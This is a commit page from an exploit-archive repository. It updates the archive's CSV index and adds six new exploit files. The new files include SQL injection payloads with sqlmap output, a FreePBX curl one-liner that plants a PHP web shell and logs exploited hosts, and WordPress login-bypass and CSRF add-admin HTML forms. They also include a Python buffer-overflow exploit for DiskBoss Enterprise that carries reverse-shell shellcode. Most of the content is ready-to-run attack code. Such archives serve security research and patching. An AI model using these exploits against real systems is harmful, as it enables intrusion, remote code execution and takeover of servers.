DB: 2017-01-11
6 new exploits DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH) ClaSS 0.8.60 - (export.php ftype) Local File Inclusion ClaSS 0.8.60 - 'export.php' Local File Inclusion Miniweb 2.0 - SQL Injection (Authentication Bypass) Miniweb 2.0 - Authentication Bypass eDNews 2.0 - (lg) Local File Inclusion eDContainer 2.22 - (lg) Local File Inclusion eDNews 2.0 - Local File Inclusion eDContainer 2.22 - Local File Inclusion Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection Ultimate PHP Board 2.2.1 - Privilege Escalation Sepcity Shopping Mall - SQL Injection Sepcity Lawyer Portal - SQL Injection Sepcity Classified - 'classdis.asp ID' SQL Injection FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection Flexphplink 0.0.x - (Authentication Bypass) SQL Injection eDNews 2.0 - (eDNews_view.php newsid) SQL Injection Sepcity Classified - 'ID' Parameter SQL Injection FlexPHPDirectory 0.0.1 - Authentication Bypass Flexphpsite 0.0.1 - Authentication Bypass Flexphplink 0.0.x - Authentication Bypass eDNews 2.0 - SQL Injection PHPAlumni - 'Acomment.php id' SQL Injection PHPAlumni - SQL Injection Flexphpic 0.0.x - (Authentication Bypass) SQL Injection Flexphpic 0.0.x - Authentication Bypass Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection Mole Group Vacation Estate Listing Script - Blind SQL Injection Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass) Friends in War Make or Break 1.3 - Authentication Bypass My Php Dating 2.0 - 'path' Parameter SQL Injection My Php Dating 2.0 - 'id' Parameter SQL Injection My PHP Dating 2.0 - 'path' Parameter SQL Injection My PHP Dating 2.0 - 'id' Parameter SQL Injection Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection Starting Page 1.3 - SQL Injection Freepbx < 2.11.1.5 - Remote Code Execution WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
parent
574c0f2df8
commit
1b13c8a790
7 changed files with 247 additions and 18 deletions
42
files.csv
42
files.csv
|
@ -15204,6 +15204,7 @@ id,file,description,date,author,platform,type,port
|
|||
40963,platforms/linux/remote/40963.txt,"OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading",2016-12-23,"Google Security Research",linux,remote,22
|
||||
40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
|
||||
40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
|
||||
41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -20356,9 +20357,9 @@ id,file,description,date,author,platform,type,port
|
|||
7574,platforms/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' Parameter SQL Injection",2008-12-24,boom3rang,php,webapps,0
|
||||
7575,platforms/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,php,webapps,0
|
||||
7576,platforms/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,php,webapps,0
|
||||
7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - (export.php ftype) Local File Inclusion",2008-12-24,fuzion,php,webapps,0
|
||||
7579,platforms/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
|
||||
7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,php,webapps,0
|
||||
7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - SQL Injection (Authentication Bypass)",2008-12-28,bizzit,php,webapps,0
|
||||
7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,php,webapps,0
|
||||
7587,platforms/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,php,webapps,0
|
||||
7593,platforms/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,php,webapps,0
|
||||
7595,platforms/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,php,webapps,0
|
||||
|
@ -20369,26 +20370,26 @@ id,file,description,date,author,platform,type,port
|
|||
7600,platforms/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,php,webapps,0
|
||||
7601,platforms/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,php,webapps,0
|
||||
7602,platforms/php/webapps/7602.txt,"webClassifieds 2005 - (Authentication Bypass) SQL Injection",2008-12-29,AnGeL25dZ,php,webapps,0
|
||||
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - (lg) Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7603,platforms/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7604,platforms/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,php,webapps,0
|
||||
7605,platforms/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,php,webapps,0
|
||||
7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,php,webapps,0
|
||||
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - (log inj) Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
|
||||
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - 'shpdetails.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - 'deptdisplay.asp ID' SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,php,webapps,0
|
||||
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,asp,webapps,0
|
||||
7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,php,webapps,0
|
||||
7612,platforms/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",php,webapps,0
|
||||
7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'classdis.asp ID' SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
|
||||
7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
|
||||
7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
|
||||
7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - (Authentication Bypass) SQL Injection",2008-12-29,x0r,php,webapps,0
|
||||
7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - (eDNews_view.php newsid) SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
|
||||
7613,platforms/asp/webapps/7613.txt,"Sepcity Classified - 'ID' Parameter SQL Injection",2008-12-29,S.W.A.T.,asp,webapps,0
|
||||
7614,platforms/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
|
||||
7615,platforms/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,php,webapps,0
|
||||
7616,platforms/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,php,webapps,0
|
||||
7619,platforms/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",php,webapps,0
|
||||
7620,platforms/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,php,webapps,0
|
||||
7621,platforms/php/webapps/7621.txt,"PHPAlumni - 'Acomment.php id' SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
|
||||
7621,platforms/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,php,webapps,0
|
||||
7622,platforms/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Login Bypass / Possible PHP code writing",2008-12-29,Osirys,php,webapps,0
|
||||
7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - (Authentication Bypass) SQL Injection",2008-12-30,S.W.A.T.,php,webapps,0
|
||||
7624,platforms/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,php,webapps,0
|
||||
7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
|
||||
7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0
|
||||
7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,php,webapps,0
|
||||
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
|
||||
7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
|
||||
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
|
||||
|
@ -26240,7 +26241,7 @@ id,file,description,date,author,platform,type,port
|
|||
22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.asp Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0
|
||||
22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Full Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0
|
||||
22735,platforms/php/webapps/22735.txt,"iDev Rentals 1.0 - Multiple Vulnerabilities",2012-11-15,Vulnerability-Lab,php,webapps,0
|
||||
22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Authentication Bypass)",2012-11-15,d3b4g,php,webapps,0
|
||||
22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - Authentication Bypass",2012-11-15,d3b4g,php,webapps,0
|
||||
22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0
|
||||
22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0
|
||||
22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0
|
||||
|
@ -36941,5 +36942,10 @@ id,file,description,date,author,platform,type,port
|
|||
40989,platforms/jsp/webapps/40989.txt,"Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting",2017-01-04,"Jodson Santos",jsp,webapps,0
|
||||
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
|
||||
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
|
||||
40999,platforms/php/webapps/40999.txt,"My Php Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
|
||||
41001,platforms/php/webapps/41001.txt,"My Php Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
|
||||
40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
|
||||
41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
|
||||
41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
|
||||
41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0
|
||||
41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
|
||||
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
|
||||
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
42
platforms/php/webapps/41002.txt
Executable file
42
platforms/php/webapps/41002.txt
Executable file
|
@ -0,0 +1,42 @@
|
|||
# Exploit : Make or Break 1.7 (imgid) SQL Injection Vulnerability
|
||||
# Author : v3n0m
|
||||
# Contact : v3n0m[at]outlook[dot]com
|
||||
# Date : January, 09-2017 GMT +7:00 Jakarta, Indonesia
|
||||
# Software : Make or Break
|
||||
# Version : 1.7 Lower versions may also be affected
|
||||
# License : Free
|
||||
# Download : http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9
|
||||
# Credits : YOGYACARDERLINK, Dhea Fathin Karima & YOU !!
|
||||
|
||||
1. Description
|
||||
|
||||
An attacker can exploit this vulnerability to read from the database.
|
||||
The parameter 'imgid' is vulnerable.
|
||||
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
http://domain.tld/[path]/index.php?imgid=-9999+union+all+select+null,null,null,null,version(),null--
|
||||
|
||||
# Exploitation via SQLMap
|
||||
|
||||
Parameter: imgid (GET)
|
||||
Type: boolean-based blind
|
||||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||
Payload: imgid=1 AND 4688=4688
|
||||
Vector: AND [INFERENCE]
|
||||
|
||||
Type: AND/OR time-based blind
|
||||
Title: MySQL >= 5.0.12 OR time-based blind
|
||||
Payload: imgid=1 OR SLEEP(2)
|
||||
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
|
||||
|
||||
Type: UNION query
|
||||
Title: Generic UNION query (NULL) - 11 columns
|
||||
Payload: imgid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176786271,0x746264586d76465246657a5778446f756c6d696859494e7247735476506447726470676f4e544c59,0x71706b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- WQyQ
|
||||
Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL[GENERIC_SQL_COMMENT]
|
||||
|
||||
|
||||
3. Security Risk
|
||||
|
||||
The security risk of the remote sql-injection web vulnerability in the Make or Break CMS is estimated as high.
|
22
platforms/php/webapps/41004.txt
Executable file
22
platforms/php/webapps/41004.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
# Vulnerability: Starting Page- SQL Injection
|
||||
|
||||
# Date: 10.01.2017
|
||||
|
||||
# Vendor Homepage: http://software.friendsinwar.com/
|
||||
|
||||
# Tested on: win10
|
||||
|
||||
# Author: JaMbA
|
||||
|
||||
# Script link: http://software.friendsinwar.com/news.php?readmore=31
|
||||
|
||||
#########################
|
||||
|
||||
|
||||
# SQL Injection/Exploit :
|
||||
|
||||
# Vulnerable Parametre : linkid
|
||||
|
||||
# http://localhost/[PATH]/outgoing.php?linkid=[SQL]
|
||||
|
||||
Tunisia 4 ever
|
37
platforms/php/webapps/41005.txt
Executable file
37
platforms/php/webapps/41005.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
Exploit Title: Freepbx coockie recordings injection
|
||||
Google Dork: Ask Santa
|
||||
Date: 23/12/2016
|
||||
Exploit Author: inj3ctor3
|
||||
Vendor Homepage: https://www.freepbx.org/
|
||||
Software Link: ISO LINKS IN SITE https://www.freepbx.org/
|
||||
Version: ALL && unpatched/ (Trixbox/freepbx/elastix/pbxinflash/)
|
||||
Tested on: Centos 6
|
||||
CVE : CVE-2014-7235
|
||||
|
||||
1. Description
|
||||
|
||||
a critical Zero-Day Remote Code Execution and Privilege Escalation
|
||||
exploit within the legacy “FreePBX ARI Framework module/Asterisk
|
||||
Recording Interface (ARI)”.
|
||||
htdocs_ari/includes/login.php in the ARI Framework module/Asterisk Recording Interface (ARI) in FreePBX before 2.9.0.9, 2.10.x,
|
||||
and 2.11 before 2.11.1.5 allows remote attackers to execute arbitrary code via the ari_auth coockie,
|
||||
related to the PHP unserialize function
|
||||
|
||||
<?php
|
||||
.....
|
||||
...
|
||||
line 56 $buf = unserialize(stripslashes($_COOKIE['ari_auth']));
|
||||
line 57 list($data,$chksum) = $buf;
|
||||
....
|
||||
?>
|
||||
|
||||
A successful attack may compromise the whole system aiding the hacker to gain
|
||||
|
||||
further privileges via taking advantage of famous nmap shell
|
||||
|
||||
without further or do this is a poc code
|
||||
|
||||
curl -ks -m20 http://127.0.0.1/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "<?php if(\$_COOKIE[\"lang\"]) {system(\$_COOKIE[\"lang\"]);}die();?>");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
|
||||
|
||||
if curl -ks -m10 "http://127.0.0.1/recordings/misc/audio.php" --cookie "lang=id" | grep asterisk >/dev/null;then echo "127.0.0.1/recordings/misc/audio.php" | tee -a xploited_new.txt;fi
|
||||
|
24
platforms/php/webapps/41006.txt
Executable file
24
platforms/php/webapps/41006.txt
Executable file
|
@ -0,0 +1,24 @@
|
|||
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
|
||||
# Date: 10-01-2017
|
||||
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
|
||||
# Exploit Author: Kacper Szurek
|
||||
# Contact: http://twitter.com/KacperSzurek
|
||||
# Website: http://security.szurek.pl/
|
||||
# Category: web
|
||||
|
||||
1. Description
|
||||
|
||||
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
|
||||
|
||||
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
|
||||
|
||||
2. Proof of Concept
|
||||
|
||||
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
|
||||
Username: <input type="text" name="username" value="administrator">
|
||||
<input type="hidden" name="email" value="sth">
|
||||
<input type="hidden" name="action" value="loginGuestFacebook">
|
||||
<input type="submit" value="Login">
|
||||
</form>
|
||||
|
||||
Then you can go to admin panel.
|
32
platforms/php/webapps/41007.html
Executable file
32
platforms/php/webapps/41007.html
Executable file
|
@ -0,0 +1,32 @@
|
|||
# # # # #
|
||||
# Vulnerability: Add Admin Exploit (Add/Edit/Delete/ Category, Admin Vs...)
|
||||
# Google Dork: FMyLife Clone Script
|
||||
# Date:10.01.2017
|
||||
# Vendor Homepage: http://alstrasoft.com/fmylife-pro.htm
|
||||
# Tested on: http://www.tellaboutit.com/admin/
|
||||
# Script Name: FMyLife Clone Script (Pro Edition)
|
||||
# Script Version: 1.1
|
||||
# Script Buy Now: http://www.hotscripts.com/listing/fmylife-clone-script-pro-edition/
|
||||
# Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Mail : ihsan[beygir]ihsan[nokta]net
|
||||
# # # # #
|
||||
#Exploit :
|
||||
<html>
|
||||
<body>
|
||||
<h2>Add an Administrator</h2>
|
||||
<form action="http://localhost/[PATH]/admin/" method="post">
|
||||
<div id="add-admin-form">
|
||||
<input type="hidden" name="action" value="add-admin" />
|
||||
<label for="username">Username:</label>
|
||||
<input type="text" id="username" name="admin-username" value="" />
|
||||
<div class="spacer"></div>
|
||||
<label for="password">Password:</label>
|
||||
<input type="password" id="password" name="admin-password" value="" />
|
||||
<div class="spacer"></div>
|
||||
<input type="image" src="add-administrator.png" name="add-admin" id="add-admin" value="Add Administrator" />
|
||||
</div>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
# # # # #
|
66
platforms/windows/remote/41003.py
Executable file
66
platforms/windows/remote/41003.py
Executable file
|
@ -0,0 +1,66 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
# Exploit Title: DiskBoss Enterprise 7.5.12 SEH + Egghunter Buffer Overflow
|
||||
# Date: 10-01-2017
|
||||
# Exploit Author: Wyndell Bibera
|
||||
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v7.5.12.exe
|
||||
# Version: 7.5.12
|
||||
# Tested on: Windows XP Professional SP3
|
||||
|
||||
import socket
|
||||
|
||||
ip = "192.168.86.150"
|
||||
port = 80
|
||||
|
||||
egg = "ezggezgg"
|
||||
nopslide = "\x90" * 8
|
||||
|
||||
# Bad characters: \x00\x09\x0a\x0d\x20
|
||||
# Reverse Shell @ Port 443 - Change shellcode section accordingly
|
||||
shellcode = ("\xb8\x45\x49\xe1\x98\xda\xc5\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
|
||||
"\x52\x31\x47\x12\x03\x47\x12\x83\x82\x4d\x03\x6d\xf0\xa6\x41"
|
||||
"\x8e\x08\x37\x26\x06\xed\x06\x66\x7c\x66\x38\x56\xf6\x2a\xb5"
|
||||
"\x1d\x5a\xde\x4e\x53\x73\xd1\xe7\xde\xa5\xdc\xf8\x73\x95\x7f"
|
||||
"\x7b\x8e\xca\x5f\x42\x41\x1f\x9e\x83\xbc\xd2\xf2\x5c\xca\x41"
|
||||
"\xe2\xe9\x86\x59\x89\xa2\x07\xda\x6e\x72\x29\xcb\x21\x08\x70"
|
||||
"\xcb\xc0\xdd\x08\x42\xda\x02\x34\x1c\x51\xf0\xc2\x9f\xb3\xc8"
|
||||
"\x2b\x33\xfa\xe4\xd9\x4d\x3b\xc2\x01\x38\x35\x30\xbf\x3b\x82"
|
||||
"\x4a\x1b\xc9\x10\xec\xe8\x69\xfc\x0c\x3c\xef\x77\x02\x89\x7b"
|
||||
"\xdf\x07\x0c\xaf\x54\x33\x85\x4e\xba\xb5\xdd\x74\x1e\x9d\x86"
|
||||
"\x15\x07\x7b\x68\x29\x57\x24\xd5\x8f\x1c\xc9\x02\xa2\x7f\x86"
|
||||
"\xe7\x8f\x7f\x56\x60\x87\x0c\x64\x2f\x33\x9a\xc4\xb8\x9d\x5d"
|
||||
"\x2a\x93\x5a\xf1\xd5\x1c\x9b\xd8\x11\x48\xcb\x72\xb3\xf1\x80"
|
||||
"\x82\x3c\x24\x06\xd2\x92\x97\xe7\x82\x52\x48\x80\xc8\x5c\xb7"
|
||||
"\xb0\xf3\xb6\xd0\x5b\x0e\x51\x1f\x33\x46\x2d\xf7\x46\x66\x2c"
|
||||
"\xb3\xce\x80\x44\xd3\x86\x1b\xf1\x4a\x83\xd7\x60\x92\x19\x92"
|
||||
"\xa3\x18\xae\x63\x6d\xe9\xdb\x77\x1a\x19\x96\x25\x8d\x26\x0c"
|
||||
"\x41\x51\xb4\xcb\x91\x1c\xa5\x43\xc6\x49\x1b\x9a\x82\x67\x02"
|
||||
"\x34\xb0\x75\xd2\x7f\x70\xa2\x27\x81\x79\x27\x13\xa5\x69\xf1"
|
||||
"\x9c\xe1\xdd\xad\xca\xbf\x8b\x0b\xa5\x71\x65\xc2\x1a\xd8\xe1"
|
||||
"\x93\x50\xdb\x77\x9c\xbc\xad\x97\x2d\x69\xe8\xa8\x82\xfd\xfc"
|
||||
"\xd1\xfe\x9d\x03\x08\xbb\xae\x49\x10\xea\x26\x14\xc1\xae\x2a"
|
||||
"\xa7\x3c\xec\x52\x24\xb4\x8d\xa0\x34\xbd\x88\xed\xf2\x2e\xe1"
|
||||
"\x7e\x97\x50\x56\x7e\xb2")
|
||||
scpad = "\x90" * (2480 - len(shellcode) - len(nopslide))
|
||||
shortjmp = "\xeb\x0f\x90\x90"
|
||||
|
||||
# Search for string 'ezgg' twice
|
||||
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
|
||||
"\xef\xb8\x65\x7a\x67\x67\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
|
||||
|
||||
extra = "\x90" * 9
|
||||
pad = "\x90" * (5000 - len(extra) - 2496 - len(egghunter))
|
||||
|
||||
# POP POP RET Instruction
|
||||
seh = "\x6b\xa6\x02\x10"
|
||||
|
||||
buffer = (
|
||||
"POST " + egg + nopslide + shellcode + scpad + shortjmp + seh + extra + egghunter + pad + " HTTP/1.1\r\n"
|
||||
"Host: :192.168.86.150\r\n"
|
||||
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
|
||||
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/* ;q=0.8\r\n\r\n")
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((ip, port))
|
||||
s.send(buffer)
|
||||
s.close()
|
Loading…
Add table
Reference in a new issue